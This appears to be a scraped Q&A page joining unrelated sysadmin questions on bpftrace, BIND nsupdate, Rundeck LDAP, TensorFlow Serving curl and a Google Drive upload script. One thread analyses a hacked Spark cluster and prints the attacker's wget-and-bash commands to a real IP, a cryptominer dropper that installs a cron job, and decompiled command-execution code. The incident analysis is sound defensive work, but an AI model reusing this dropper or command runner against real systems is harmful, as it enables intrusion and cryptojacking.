I Want to use bpftrace to get all the http request content of my program.
cat /etc/redhat-release
CentOS Linux release 8.0.1905 (Core)
uname -a
Linux infra-test4.18.0-305.12.1.el8_4.x86_64 #1 SMP Wed Aug 11
01:59:55 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
bpftrace bt :
BEGIN
{
printf("Welcome to Offensive BPF... Use Ctrl-C to exit.\n");
}
tracepoint:syscalls:sys_enter_accept*
{
#sk[tid] = args->upeer_sockaddr;
}
tracepoint:syscalls:sys_exit_accept*
/ #sk[tid] /
{
#sys_accepted[tid] = #sk[tid];
}
tracepoint:syscalls:sys_enter_read
/ #sys_accepted[tid] /
{
printf("->sys_enter_read for allowed thread (fd: %d)\n", args->fd);
#sys_read[tid] = args->buf;
}
tracepoint:syscalls:sys_exit_read
{
if (#sys_read[tid] != 0)
{
$len = args->ret;
$cmd = str(#sys_read[tid], $len);
printf("*** Command: %s\n", $cmd);
}
}
END
{
clear(#sk);
clear(#sys_read);
clear(#sys_accepted);
printf("Exiting. Bye.\n");
}
And I star my server on 8080 and then start bpftrace :
Attaching 8 probes...
Welcome to Offensive BPF... Use Ctrl-C to exit.
then I start to curl :
curl -H "traceparent: 00-123-456-01" 127.0.0.1:8080/misc/ping -lv
The bpftrace only output :
bpftrace --unsafe http.bt
Attaching 8 probes...
Welcome to Offensive BPF... Use Ctrl-C to exit.
->sys_enter_read for allowed thread (fd: 15)
*** Command: GET /misc/ping HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: curl
->sys_enter_read for allowed thread (fd: 15)
*** Command: GET /misc/ping HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: curl
output is not the whole curl content, I don`t know why, Can anyone help?
Related
I am using nsupdate command to update a name zone, but I receive the error message update failed: REFUSED. I created the key use "rndc-confgen -a -c /etc/remote_rndc_key"
My named.conf is as follows
options {
listen-on port 53 { 9.82.159.110; };
listen-on-v6 port 53 { ::1; };
directory "/var/named";
dump-file "/var/named/data/cache_dump.db";
statistics-file "/var/named/data/named_stats.txt";
memstatistics-file "/var/named/data/named_mem_stats.txt";
secroots-file "/var/named/data/named.secroots";
recursing-file "/var/named/data/named.recursing";
allow-query { any; };
allow-update {key remote_rndc_key; };
recursion yes;
dnssec-enable no;
dnssec-validation no;
pid-file "/run/named/named.pid";
};
logging {
channel default_debug {
file "data/named.run";
severity debug 3;
};
};
zone "." IN {
type hint;
file "named.ca";
};
include "/etc/remote_rndc_key";
include "/etc/named.rfc1912.zones";
include "/etc/named.root.key";
zone "test.com" IN {
type master;
file "test.com.zone";
};
zone "82.9.in-addr.arpa" IN {
type master;
file "test.com.local";
};
key "remote_rndc_key" {
algorithm hmac-md5;
secret "lWB9P5pwaqO3FEb7GsFZkw==";
};
controls {
inet 9.82.159.110 port 953
allow { 9.82.224.110; } keys { "remote_rndc_key"; };
};
/etc/remote_rndc_key:
key "rndc-key" {
algorithm hmac-md5;
secret "lWB9P5pwaqO3FEb7GsFZkw==";
};
/var/named/test.com.zone:
$TTL 1D
# IN SOA ns1 rname.invalid. (
2019062901 ; serial
5M ; refresh
1H ; retry
1W ; expire
3H ) ; minimum
NS ns1
ns1 IN A 9.82.159.110
www IN A 9.82.100.100
use nsupdte:
[root#localhost tmp]# nsupdate -v -d -k ./remote_rndc_key
Creating key...
Creating key...
namefromtext
keycreate
> server 9.82.159.110
> update add ftps.test.com 600 A 1.1.1.2
> send
Reply from SOA query:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 40666
;; flags: qr aa ra; QUESTION: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;ftps.test.com. IN SOA
;; AUTHORITY SECTION:
test.com. 0 IN SOA ns1.test.com. rname.invalid. 2019062901 300 3600 604800 10800
;; TSIG PSEUDOSECTION:
rndc-key. 0 ANY TSIG hmac-md5.sig-alg.reg.int. 1649854961 300 16 MFdWnAJcNEQ17QovaBmzTw== 40666 NOERROR 0
Found zone name: test.com
The master is: ns1.test.com
Sending update to 9.82.159.110#53
Outgoing update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOERROR, id: 59745
;; flags:; ZONE: 1, PREREQ: 0, UPDATE: 1, ADDITIONAL: 1
;; UPDATE SECTION:
ftps.test.com. 600 IN A 1.1.1.2
;; TSIG PSEUDOSECTION:
rndc-key. 0 ANY TSIG hmac-md5.sig-alg.reg.int. 1649854961 300 16 vJjzs0bT4QxHW40mL/MT7g== 59745 NOERROR 0
Reply from update query:
;; ->>HEADER<<- opcode: UPDATE, status: REFUSED, id: 59745
;; flags: qr; ZONE: 1, PREREQ: 0, UPDATE: 0, ADDITIONAL: 1
;; ZONE SECTION:
;test.com. IN SOA
;; TSIG PSEUDOSECTION:
rndc-key. 0 ANY TSIG hmac-md5.sig-alg.reg.int. 1649854961 300 16 FAcO+t5JUdOJdC1mRuHNeA== 59745 NOERROR 0
named server log as below:
[root#localhost named]# systemctl status named
● named.service - Berkeley Internet Name Domain (DNS)
Loaded: loaded (/usr/lib/systemd/system/named.service; enabled; vendor preset: disabled)
Active: active (running) since Wed 2022-04-13 20:36:14 CST; 29min ago
Process: 3371415 ExecStartPre=/bin/bash -c if [ ! "$DISABLE_ZONE_CHECKING" == "yes" ]; then /usr/sbin/named-checkconf -z "$NAMEDCONF"; else echo "Checking of zone files is disabled"; fi (code=exited, >
Process: 3371418 ExecStart=/usr/sbin/named -u named -c ${NAMEDCONF} $OPTIONS (code=exited, status=0/SUCCESS)
Main PID: 3371421 (named)
Tasks: 35
Memory: 88.8M
CGroup: /system.slice/named.service
└─3371421 /usr/sbin/named -u named -c /etc/named.conf
Apr 13 20:36:32 localhost.localdomain named[3371421]: client #0x7ff1f0108770 9.82.224.110#59471/key rndc-key: signer "rndc-key" denied
What can be the reason?
I confused the key name with the key file name:
/etc/remote_rndc_key:
key "rndc-key" {
algorithm hmac-md5;
secret "lWB9P5pwaqO3FEb7GsFZkw==";
};
should be changed to:
key "remote_rndc_key" {
algorithm hmac-md5;
secret "lWB9P5pwaqO3FEb7GsFZkw==";
};
I got this error today on my "hidden primary" Bind dns server, and wasted a couple of hours to find the reason for the failure.
At the end, I got tired and tried again, and then it worked.
So my advice is: Try again, it may be a bug.
I suddenly got an issue with my rundeck, whenever I am trying to access it, it says Invalid user name and password.
Here is the errors from service.log
2019-10-18 17:06:58.447:INFO:cdrjj.JettyCachingLdapLoginModule:qtp683347804-24: Login attempts: 1, Hits: 0, Ratio: 0%.
2019-10-18 17:06:58.468:INFO:cdrjj.JettyCachingLdapLoginModule:qtp683347804-24: Attempting authentication: CN=Lastname, Firstname,OU=Intern,OU=USERS,OU=City,OU=Country,DC=company,DC=lan
Oct 18, 2019 5:06:58 PM org.rundeck.jaas.jetty.JettyRolePropertyFileLoginModule debug
INFO: AbstractSharedLoginModule: login with sharedLoginState auth, try? false, use? true
Oct 18, 2019 5:06:58 PM org.rundeck.jaas.jetty.JettyRolePropertyFileLoginModule debug
INFO: JettyRolePropertyFileLoginModule: userInfo found for first.last? true
Oct 18, 2019 5:06:58 PM org.rundeck.jaas.jetty.JettyRolePropertyFileLoginModule debug
INFO: AbstractSharedLoginModule: using login result: true
Oct 18, 2019 5:06:58 PM org.rundeck.jaas.jetty.JettyRolePropertyFileLoginModule debug
INFO: role names: [first.last, ADMINGRP]
2019-10-18 17:06:58.553:WARN:oejj.JAASLoginService:qtp683347804-24:
javax.security.auth.login.LoginException: java.lang.NullPointerException: invalid null input(s)|?at java.util.Objects.requireNonNull(Objects.java:239)|?at javax.security.auth.Subject$SecureSet.add(Subject.java:1321)|?at java.util.Collections$SynchronizedCollection.add(Collections.java:2048)|?at org.eclipse.jetty.jaas.spi.AbstractLoginModule$JAASUserInfo.setJAASInfo(AbstractLoginModule.java:95)|?at org.eclipse.jetty.jaas.spi.AbstractLoginModule.commit(AbstractLoginModule.java:189)|?at com.dtolabs.rundeck.jetty.jaas.JettyCachingLdapLoginModule.commit(JettyCachingLdapLoginModule.java:895)|?at com.dtolabs.rundeck.jetty.jaas.JettyCombinedLdapLoginModule.commit(JettyCombinedLdapLoginModule.java:182)|?at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)|?at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:90)|?at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:55)|?at java.lang.reflect.Method.invoke(Method.java:508)|?at javax.security.auth.login.LoginContext.invoke(LoginContext.java:788)|?at javax.security.auth.login.LoginContext.access$000(LoginContext.java:196)|?at javax.security.auth.login.LoginContext$4.run(LoginContext.java:698)|?at javax.security.auth.login.LoginContext$4.run(LoginContext.java:696)|?at java.security.AccessController.doPrivileged(AccessController.java:734)|?at javax.security.auth.login.LoginContext.invokePriv(LoginContext.java:696)|?at javax.security.auth.login.LoginContext.login(LoginContext.java:598)|?at org.eclipse.jetty.jaas.JAASLoginService.login(JAASLoginService.java:241)|?at org.eclipse.jetty.security.authentication.LoginAuthenticator.login(LoginAuthenticator.java:52)|?at org.eclipse.jetty.security.authentication.FormAuthenticator.login(FormAuthenticator.java:192)|?at org.eclipse.jetty.security.authentication.FormAuthenticator.validateRequest(FormAuthenticator.java:229)|?at org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:499)|?at org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:213)|?at org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1097)|?at org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:448)|?at org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:175)|?at org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1031)|?at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:136)|?at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)|?at org.eclipse.jetty.server.Server.handle(Server.java:446)|?at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:271)|?at org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:246)|?at org.eclipse.jetty.io.AbstractConnection$ReadCallback.run(AbstractConnection.java:358)|?at org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:601)|?at org.eclipse.jetty.util.thread.QueuedThreadPool$3.run(QueuedThreadPool.java:532)|?at java.lang.Thread.run(Thread.java:818)|
at javax.security.auth.login.LoginContext.invoke(LoginContext.java:890)
at javax.security.auth.login.LoginContext.access$000(LoginContext.java:196)
at javax.security.auth.login.LoginContext$4.run(LoginContext.java:698)
at javax.security.auth.login.LoginContext$4.run(LoginContext.java:696)
at java.security.AccessController.doPrivileged(AccessController.java:734)
at javax.security.auth.login.LoginContext.invokePriv(LoginContext.java:696)
at javax.security.auth.login.LoginContext.login(LoginContext.java:598)
at org.eclipse.jetty.jaas.JAASLoginService.login(JAASLoginService.java:241)
at org.eclipse.jetty.security.authentication.LoginAuthenticator.login(LoginAuthenticator.java:52)
at org.eclipse.jetty.security.authentication.FormAuthenticator.login(FormAuthenticator.java:192)
at org.eclipse.jetty.security.authentication.FormAuthenticator.validateRequest(FormAuthenticator.java:229)
at org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:499)
at org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:213)
at org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1097)
at org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:448)
at org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:175)
at org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1031)
at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:136)
at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)
at org.eclipse.jetty.server.Server.handle(Server.java:446)
at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:271)
at org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:246)
at org.eclipse.jetty.io.AbstractConnection$ReadCallback.run(AbstractConnection.java:358)
at org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:601)
at org.eclipse.jetty.util.thread.QueuedThreadPool$3.run(QueuedThreadPool.java:532)
at java.lang.Thread.run(Thread.java:818)
Here is my Profile file:
RDECK_INSTALL="${RDECK_INSTALL:-/var/lib/rundeck}"
RDECK_BASE="${RDECK_BASE:-/var/lib/rundeck}"
RDECK_CONFIG="${RDECK_CONFIG:-/etc/rundeck}"
RDECK_SERVER_BASE="${RDECK_SERVER_BASE:-$RDECK_BASE}"
RDECK_SERVER_CONFIG="${RDECK_SERVER_CONFIG:-$RDECK_CONFIG}"
RDECK_SERVER_DATA="${RDECK_SERVER_DATA:-$RDECK_BASE/data}"
RDECK_PROJECTS="${RDECK_PROJECTS:-$RDECK_BASE/projects}"
RUNDECK_TEMPDIR="${RUNDECK_TEMPDIR:-/tmp/rundeck}"
RUNDECK_WORKDIR="${RUNDECK_TEMPDIR:-$RDECK_BASE/work}"
RUNDECK_LOGDIR="${RUNDECK_LOGDIR:-$RDECK_BASE/logs}"
RDECK_JVM_SETTINGS="${RDECK_JVM_SETTINGS:- -Xmx1024m -Xms256m -XX:MaxPermSize=256m -server}"
RDECK_TRUSTSTORE_FILE="${RDECK_TRUSTSTORE_FILE:-$RDECK_CONFIG/ssl/truststore}"
RDECK_TRUSTSTORE_TYPE="${RDECK_TRUSTSTORE_TYPE:-jks}"
JAAS_CONF="${JAAS_CONF:-$RDECK_CONFIG/jaas-loginmodule.conf}"
LOGIN_MODULE="${LOGIN_MODULE:-RDpropertyfilelogin}"
RDECK_HTTP_PORT=${RDECK_HTTP_PORT:-4440}
RDECK_HTTPS_PORT=${RDECK_HTTPS_PORT:-4443}
if [ -z "$JAVA_CMD" ] && [ -n "$JAVA_HOME" ] && [ -x "$JAVA_HOME/bin/java" ] ; then
JAVA_CMD=$JAVA_HOME/bin/java
PATH=$PATH:$JAVA_HOME/bin
export JAVA_HOME
elif [ -z "$JAVA_CMD" ] ; then
JAVA_CMD=java
fi
for jar in $(find $RDECK_INSTALL/cli -name '.jar') ; do
CLI_CP=${CLI_CP:+$CLI_CP:}$jar
done
for jar in $(find $RDECK_INSTALL/bootstrap -name '.jar') ; do
BOOTSTRAP_CP=${BOOTSTRAP_CP:+$BOOTSTRAP_CP:}$jar
done
RDECK_JVM="-Djava.security.auth.login.config=/etc/rundeck/jaas-activedirectory.conf
-Dloginmodule.name=multiauth
-Drdeck.config=$RDECK_CONFIG
-Drundeck.server.configDir=$RDECK_SERVER_CONFIG
-Dserver.datastore.path=$RDECK_SERVER_DATA/rundeck
-Drundeck.server.serverDir=$RDECK_INSTALL
-Drdeck.projects=$RDECK_PROJECTS
-Drdeck.runlogs=$RUNDECK_LOGDIR
-Drundeck.config.location=$RDECK_CONFIG/rundeck-config.properties
-Djava.io.tmpdir=$RUNDECK_TEMPDIR
-Drundeck.server.workDir=$RUNDECK_WORKDIR
-Dserver.http.port=$RDECK_HTTP_PORT"
if [ -n "$RUNDECK_WITH_SSL" ] ; then
RDECK_JVM="$RDECK_JVM -Drundeck.ssl.config=$RDECK_SERVER_CONFIG/ssl/ssl.properties -Dserver.https.port=${RDECK_HTTPS_PORT}"
RDECK_SSL_OPTS="${RDECK_SSL_OPTS:- -Djavax.net.ssl.trustStore=$RDECK_TRUSTSTORE_FILE -Djavax.net.ssl.trustStoreType=$RDECK_TRUSTSTORE_TYPE -Djava.protocol.handler.pkgs=com.sun.net.ssl.internal.www.protocol}"
fi
unset JRE_HOME
umask 002
rundeckd="$JAVA_CMD $RDECK_JVM $RDECK_JVM_OPTS -cp $BOOTSTRAP_CP com.dtolabs.rundeck.RunServer $RDECK_BASE"
Here is my jaas-activedirectory.conf:
multiauth {
com.dtolabs.rundeck.jetty.jaas.JettyCombinedLdapLoginModule required
debug="true"
contextFactory="com.sun.jndi.ldap.LdapCtxFactory"
providerUrl="ldap://ldaphostname.example.lan:3268"
bindDn="ebi_ad_d#example.lan"
bindPassword="maskpassword"
authenticationMethod="simple"
forceBindingLogin="true"
userBaseDn="DC=example,DC=lan"
userRdnAttribute="sAMAccountName"
userIdAttribute="sAMAccountName"
userPasswordAttribute="unicodePwd"
userObjectClass="user"
roleBaseDn="OU=Rundeck,OU=GROUPS APPLICATION,OU=CITY,OU=COUNTRY,DC=example,DC=lan"
roleNameAttribute="sAMAccountName"
roleMemberAttribute="member"
roleObjectClass="group"
cacheDurationMillis="300000"
supplementalRoles="user"
reportStatistics="true"
timeoutRead="10000"
timeoutConnect="20000"
nestedGroups="true"
ignoreRoles="true"
storePass="true";
org.eclipse.jetty.jaas.spi.PropertyFileLoginModule sufficient
debug="true"
storePass="true"
file="/etc/rundeck/realm.properties";
org.rundeck.jaas.jetty.JettyRolePropertyFileLoginModule required
debug="true"
useFirstPass="true"
file="/etc/rundeck/realm.properties"
refreshInterval="60"
caseInsensitive="true";
};
My Rundeck detail
Rundeck version: 2.10
install type: rpm
OS Name/version: RHE release 6
DB Type/version: h2
Check the order of your modules, I tested with "sufficient" first and later "required" and works.
Also, check how do you call your users (userBaseDn) and roles (roleBaseDn) in your LDAP section.
Make sure that you're launching the Rundeck instance with -Drundeck.jaaslogin=true -Dloginmodule.conf.name=jaas-multiauth.conf and -Dloginmodule.name=multiauth parameters.
I'm using this tutorial TensorFlow Serving with Docker to query
curl -d '{"instances": [1.0, 2.0, 5.0]}' \
-X POST http://localhost:8501/v1/models/half_plus_two:predict
It returns
`C:\WINDOWS\system32>curl -d '{"instances": [1.0, 2.0, 5.0]}' -X POST http://localhost:8501/v1/models/half_plus_two:predict
curl: (3) [globbing] bad range in column 2
curl: (6) Could not resolve host: 2.0,
curl: (3) [globbing] unmatched close brace/bracket in column 4
{ "error": "JSON Parse error: Invalid value. at offset: 0" }`
But the docker is running fine.
PS E:\git_portable> docker run -t --rm -p 8501:8501 -v "E:\git_portable\serving\tensorflow_serving\servables\tensorflow\testdata\saved_model_half_plus_two_cpu:/models/half_plus_two" -e MODEL_NAME=half_plus_two tensorflow/serving
2019-11-10 07:11:17.037045: I tensorflow_serving/model_servers/server.cc:85] Building single TensorFlow model file config: model_name: half_plus_two model_base_path: /models/half_plus_two
2019-11-10 07:11:17.037797: I tensorflow_serving/model_servers/server_core.cc:462] Adding/updating models.
2019-11-10 07:11:17.037861: I tensorflow_serving/model_servers/server_core.cc:573] (Re-)adding model: half_plus_two
2019-11-10 07:11:17.158245: I tensorflow_serving/core/basic_manager.cc:739] Successfully reserved resources to load servable {name: half_plus_two version: 123}
2019-11-10 07:11:17.158435: I tensorflow_serving/core/loader_harness.cc:66] Approving load for servable version {name: half_plus_two version: 123}
2019-11-10 07:11:17.158496: I tensorflow_serving/core/loader_harness.cc:74] Loading servable version {name: half_plus_two version: 123}
2019-11-10 07:11:17.158573: I external/org_tensorflow/tensorflow/cc/saved_model/reader.cc:31] Reading SavedModel from: /models/half_plus_two/00000123
2019-11-10 07:11:17.170610: I external/org_tensorflow/tensorflow/cc/saved_model/reader.cc:54] Reading meta graph with tags { serve }
2019-11-10 07:11:17.172642: I external/org_tensorflow/tensorflow/core/platform/cpu_feature_guard.cc:142] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 FMA
2019-11-10 07:11:17.212202: I external/org_tensorflow/tensorflow/cc/saved_model/loader.cc:202] Restoring SavedModel bundle.
2019-11-10 07:11:17.230431: I external/org_tensorflow/tensorflow/cc/saved_model/loader.cc:151] Running initialization op on SavedModel bundle at path: /models/half_plus_two/00000123
2019-11-10 07:11:17.236016: I external/org_tensorflow/tensorflow/cc/saved_model/loader.cc:311] SavedModel load for tags { serve }; Status: success. Took 77445 microseconds.
2019-11-10 07:11:17.237262: I tensorflow_serving/servables/tensorflow/saved_model_warmup.cc:105] No warmup data file found at /models/half_plus_two/00000123/assets.extra/tf_serving_warmup_requests
2019-11-10 07:11:17.247605: I tensorflow_serving/core/loader_harness.cc:87] Successfully loaded servable version {name: half_plus_two version: 123}
2019-11-10 07:11:17.250931: I tensorflow_serving/model_servers/server.cc:353] Running gRPC ModelServer at 0.0.0.0:8500 ...
[warn] getaddrinfo: address family for nodename not supported
2019-11-10 07:11:17.252948: I tensorflow_serving/model_servers/server.cc:373] Exporting HTTP/REST API at:localhost:8501 ...
When I run plain curl to localhost, it returns fine.
C:\WINDOWS\system32>curl http://localhost:8501/v1/models/half_plus_two
{
"model_version_status": [
{
"version": "123",
"state": "AVAILABLE",
"status": {
"error_code": "OK",
"error_message": ""
}
}
]
}
What am I doing wrong here?
We had the same issue. Here ..
Windows's cmd doesn't support strings with single quotes. Use " and
escape the inner ones with \".
in this link: Windows: curl with json data on the command line
now,
`C:\WINDOWS\system32>curl -d "{\"instances\": [1.0, 2.0, 5.0]}" \
-X POST http://127.0.0.1:8501/v1/models/half_plus_two:predict
{
"predictions": [2.5, 3.0, 4.5
]
}`
After a lot search and research, I turn to find help here.
The problem is that once a Spark cluster is built(one master and 4 workers with different IP address), each executor will submit "driver" constantly. From web UI, I can see a class named "Exploit" submitted with the "driver". web UI
Following is head and tail of log file of one worker.
Launch Command: "/usr/lib/jvm/jdk1.8/jre/bin/java" "-cp" "/home/labuser/spark/conf/:/home/labuser/spark/jars/*" "-Xmx1024M" "-Dspark.eventLog.enabled=true" "-Dspark.driver.supervise=false" "-Dspark.submit.deployMode=cluster" "-Dspark.app.name=Exploit" "-Dspark.jars=http://192.99.142.226:8220/Exploit.jar" "-Dspark.master=spark://129.10.58.200:7077" "org.apache.spark.deploy.worker.DriverWrapper" "spark://Worker#129.10.58.202:44717" "/home/labuser/spark/work/driver-20180815111311-0065/Exploit.jar" "Exploit" "wget -O /var/tmp/a.sh http://192.99.142.248:8220/cron5.sh,bash /var/tmp/a.sh
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.allocator.type: unpooled
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.threadLocalDirectBufferSize: 65536
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.maxThreadLocalCharBufferSize: 16384
18/08/15 11:13:56 DEBUG NetUtil: Loopback interface: lo (lo, 0:0:0:0:0:0:0:1%lo)
18/08/15 11:13:56 DEBUG NetUtil: /proc/sys/net/core/somaxconn: 128
18/08/15 11:13:57 DEBUG TransportServer: Shuffle server started on port: 46034
18/08/15 11:13:57 INFO Utils: Successfully started service 'Driver' on port 46034.
18/08/15 11:13:57 INFO WorkerWatcher: Connecting to worker spark://Worker#129.10.58.202:44717
18/08/15 11:13:58 DEBUG TransportClientFactory: Creating new connection to /129.10.58.202:44717
18/08/15 11:13:59 DEBUG AbstractByteBuf: -Dio.netty.buffer.bytebuf.checkAccessible: true
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.level: simple
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.maxRecords: 4
18/08/15 11:13:59 DEBUG ResourceLeakDetectorFactory: Loaded default ResourceLeakDetector: io.netty.util.ResourceLeakDetector#350d33b5
18/08/15 11:14:00 DEBUG TransportClientFactory: Connection to /129.10.58.202:44717 successful, running bootstraps...
18/08/15 11:14:00 INFO TransportClientFactory: Successfully created connection to /129.10.58.202:44717 after 1706 ms (0 ms spent in bootstraps)
18/08/15 11:14:00 INFO WorkerWatcher: Successfully connected to spark://Worker#129.10.58.202:44717
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxCapacity.default: 32768
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxSharedCapacityFactor: 2
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.linkCapacity: 16
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.ratio: 8
I found there is a "Exploit" code which hacks Spark cluster by taking advantage of the fact that anyone can submit applications to an unauthorized Spark cluster.
ARBITRARY CODE EXECUTION IN UNSECURED APACHE SPARK CLUSTER
But I don't think my cluster is hacked. Cause after applying authorized mode, this problem still exists.
My question is anyone else have this problem? And why would this happen?
THIS IS VERY ALARMING!
Firstly, the decompiled source code shows that the driver will execute commands supplied to it via arguments. In your case, this wget to download the script to temp, then execute it.
The downloaded script downloads a jpg and piped to bash. THIS IS NOT AN IMAGE
wget -q -O - http://192.99.142.248:8220/logo10.jpg | bash -sh
logo10.jpg contains a cron job that contains even more source code that will be run on your cluster. You are probably seeing this job being submitted because it is starting a scheduled job.
#!/bin/sh
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w sustes |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
wget -O /var/tmp/config.json http://192.99.142.248:8220/3.json
wget -O /var/tmp/sustes http://192.99.142.248:8220/rig
chmod 777 /var/tmp/sustes
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sustes -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
Decompiled Source
public class Exploit {
public Exploit() {
}
public static void main(String[] var0) throws Exception {
String[] var1 = var0[0].split(",");
String[] var2 = var1;
int var3 = var1.length;
for(int var4 = 0; var4 < var3; ++var4) {
String var5 = var2[var4];
System.out.println(var5);
System.out.println(executeCommand(var5.trim()));
System.out.println("==============================================");
}
}
private static String executeCommand(String var0) {
StringBuilder var1 = new StringBuilder();
try {
Process var2 = Runtime.getRuntime().exec(var0);
var2.waitFor();
BufferedReader var3 = new BufferedReader(new InputStreamReader(var2.getInputStream()));
String var4;
while((var4 = var3.readLine()) != null) {
var1.append(var4).append("\n");
}
} catch (Exception var5) {
var5.printStackTrace();
}
return var1.toString();
}
}
I'm developing a program for a platform that does not have support libraries to upload or download files from Google Drive.
So I need to send the Socket commands in hand.
But I find it difficult to achieve.
My program will send files type .txt, jpg, .html and others.
I will have to send and download these files from the command line. I've tried but I was not successful ...
First to get a valid token I'm using this link that the user will open in a browser and copy the token inside my program to modify their files:
https://accounts.google.com/o/oauth2/v2/auth?scope=profile&response_type=code&state=security_token&redirect_uri=urn:ietf:wg:oauth:2.0:oob&client_id=165834794520-tit58jbii1u8itv8q8urjlda1tobsvf1.apps.googleusercontent.com
Apparently this part works correctly.
But when I use the token to send a file, it does not work.
I made this command as a test and it does not work!
I've changed the token several times thinking it might be it, but it's not.
Weird.
My files, I will send from the command line so I am not sure which method I should use, SIMPLE or MULTIPART ...
My files are small, but maybe some 5MB pass.
Look what I get in the terminal(raw socket):
S: POST /upload/drive/v3/files?uploadType=multipart HTTP/1.1
S: Host: www.googleapis.com
S: Authorization: Bearer 4/AABZB61gFY8NqyXxxxxxxxxxxr7CThy1BuDOOGL7aLiRab80
S: Content-Type: multipart/related; boundary=foo_bar_baz
S: Content-Length: 167
S:
S: --foo_bar_baz
S: Content-Type: application/json; charset=UTF-8
S:
S: {
S: "name": "myObject"
S: }
S:
S: --foo_bar_baz
S: Content-Type: image/jpeg
S:
S: [JPEG_TEST]
S: --foo_bar_baz--
Return:
HTTP/1.1 401 Unauthorized
X-GUploader-UploadID: AEnB2UoolTbsyS_gK21G07sUJrIggzH_ivy1a_KvzvnvhiyqIOYqej8JhNQ1tmZ0KiIlrYjOTejlxXYIoSiTNs3mLiLBWzCb-A
Vary: Origin
Vary: X-Origin
WWW-Authenticate: Bearer realm="https://accounts.google.com/", error=invalid_token
Content-Type: application/json; charset=UTF-8
Content-Length: 249
Date: Wed, 11 Jul 2018 12:51:18 GMT
Server: UploadServer
Alt-Svc: quic=":443"; ma=2592000; v="43,42,41,39,35"
{
"error": {
"errors": [
{
"domain": "global",
"reason": "authError",
"message": "Invalid Credentials",
"locationType": "header",
"location": "Authorization"
}
],
"code": 401,
"message": "Invalid Credentials"
}
}
The error seems to be wrong Token, but I always get new tokens and it always gives the same error!
Can someone help me???
You can use this
MAX_THREAD_NO=32
runningPids=()
canStartNewBatch=1
sequenceNo=0
# Create remote folder corresponding with the name of the local folder.
# $1: parentId: remote (gdrive) parent folder id
# $2: folderName: local folder name need to create in remote parent folder
# Usage:
# folderId=$( makeRemoteDir <parentId> <folderName> )
function makeRemoteDir () {
resultPrefix="Directory "
resultSuffix=" created"
folderId=`gdrive mkdir -p $1 $2`
folderId=${folderId%"$resultSuffix"}
folderId=${folderId#"$resultPrefix"}
echo "$folderId"
}
# Upload the files contained in the local folder to remote folder.
# $1: remoteFolderId: remote (gdrive) folder id
# $2: localFolderFullPath: the full path of local folder name need to upload
function uploadFolder () {
# Do with each item (folder or file) in the folder $2
for item in $2/*; do
while [[ ${#runningPids[#]} -ne 0 ]] && [[ canStartNewBatch -ne 1 ]]; do
removablePids=()
# Scan every PID in the running PIDs list to see if it finished or not
for pid in "${runningPids[#]}"; do
if ! ps -p $pid > /dev/null; then
removablePids+=($pid)
fi
done
if [[ ${#removablePids[#]} -ne 0 ]]; then
# Remove finished PID from the runningPids, and allow new PID put in
for removablePid in "${removablePids[#]}"; do
runningPids=( ${runningPids[#]/$removablePid} )
done
canStartNewBatch=1
else
# If no more PID finished yet, then scan again after few delay time
sleep 0.05
fi
done
canStartNewBatch=1
# If the item is a file, upload it to remote
if [[ -f "$item" ]]; then
#((sequenceNo++))
#echo "$sequenceNo $item"
gdrive upload -p $1 "$item" &
pid=$!
runningPids+=($pid)
if [ ${#runningPids[#]} -eq $MAX_THREAD_NO ]; then
